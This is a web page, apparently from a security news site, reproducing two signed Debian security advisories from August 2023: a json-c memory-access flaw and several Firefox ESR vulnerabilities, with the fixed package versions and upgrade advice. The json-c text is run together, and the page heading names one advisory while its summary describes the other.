    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5486-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 30, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : json-cCVE ID         : CVE-2021-32292An invalid memory access was discovered in json-c, a JSON librarywhich could result in denial of service.For the oldstable distribution (bullseye), this problem has been fixedin version 0.15-2+deb11u1.We recommend that you upgrade your json-c packages.For the detailed security status of json-c please refer toits security tracker page at:https://security-tracker.debian.org/tracker/json-cFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTvg0kACgkQEMKTtsN8TjbBag//SgTS3cthPTxMvtMctQnwOtbmjPNqjhWb8WVaesTs+y67+z38V1OWc6kdd5Lzxv0O9iHHOq78X8I7OEXDwltfcxNqlxMqNN2vYsTGeC4/ciVibn2PHYQbfistEM/cRifQsKDFZ8xb1R6t67kpSjy2ufiyODFkI/+q88qCzC2NrrtpL7/bGDEU+k6U61Ff7CYIntg8dW9FGGiZE7aeBQX6qF8o+6smsmRM+352xuv58lJdduy3IcxfSEFFWzMY6GrkbZEl1VqbjVWjjKGkfDaMHXzgsPmiAfqce36WXhcZeAVLMbVLgs2+ebcZJ/SP+tRkLqX7LNMpf/JjfAeYQTlR8855wEkpVGUa/l/idkEp3UxVKJzrdwLxZFiC38eE5ySywDKUeNWIF55ieA0+fDnepLmIbLc8OD2n9FVy4trMFLiyDvaRMGw5kdP5XdTJi44J8YtMO0BwFdryOX5Pqpl2WBGcXEcI4QxmdmoBAGz5pWp+kURCmou6t/h0JO6Lmc40T5jCnPT72OQM8Od7HjPgabm8L4I3McQjGNT4F1uwTe8MiTRoJQgdXrJQz4cuQ+Ifo29jZVJTdGrDBZi/OLfc73NZXrBakWj/ZHc4Ifu0cRQAxTxFhMWnmJZhXV9lFoC5Qf8XsBy99xIMJ6yjhT9SjIY6a+8xXgfw6Dlk0kt6pIg==J1IA-----END PGP SIGNATURE-----

Debian Security Advisory 5486-1

Debian Linux Security Advisory 5485-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5485-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 30, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2023-4573 CVE-2023-4574 CVE-2023-4575 CVE-2023-4581   
                 CVE-2023-4584

Multiple security issues have been found in the Mozilla Firefox  
web browser, which could potentially result in the execution  
of arbitrary code.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 102.15.0esr-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 102.15.0esr-1~deb12u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTvgbMACgkQEMKTtsN8  
TjYyYQ/5AXRB+aU6RXtKeVkBOmIZpPzJPaSpdRNJ1YUK+V4yn9Pfsyowi+KWcGGw  
pp84zjhSlkc3ewNWvcMhyKyEB7wWRhnDE/VyxmdpxsS4CydkZc8RecLxU8B9Kddy  
qkvuXoYlFjE9fitqgU2eT0plrkJTImH6dbr6klmDqK+yQu3wl/penpMxxJEJgOWo  
oKiLe5asJJrtjVcUMrHs9CO2YspXcvlj4IBIqEfwz8FrVX0R+uMZrFARPbC6nHkv  
HJ/CUXSv3dIGEjl6opFjGDNKkBpO2ZwB9K3HBxmD320jLUgkRwKCCvyr1g+ZfcBt  
WwEwy/dE3fNJkLU5VlDdzY8O5CG4+OeP4QdICaSVqoVE1PfRX+trriAsWjENLm6o  
aWu1FLqMLvPiyRGz1d3QNeSMOvYG3czycGH5nEMWztBDFDJ+xWBZ57xUcT5xTIZb  
zWz+1ZL1rYaIrNPGC1nFcX5uHnnf7rzNjl0H18+FEudUwhzKUDdLxoMWqXJVtju2  
+YlY2OqKRQH8hrhVVuxv+L3oYF+jjQB/4hL1BrjB13K1Bqffeq5zSyKes7UfZ1AZ  
cSUVUsr3RKpCO7J+5lPOZqrThSBG3DWmmCBdl1AkZW4mv/g19EssM6zANYmZHzn8  
MyyqcIGdT0srUNECfrXzSFQ7ZhpTKAvCYt2wzrQhOsb7hxP4sa8=  
=s7Qw  
-----END PGP SIGNATURE-----

Tag

#debian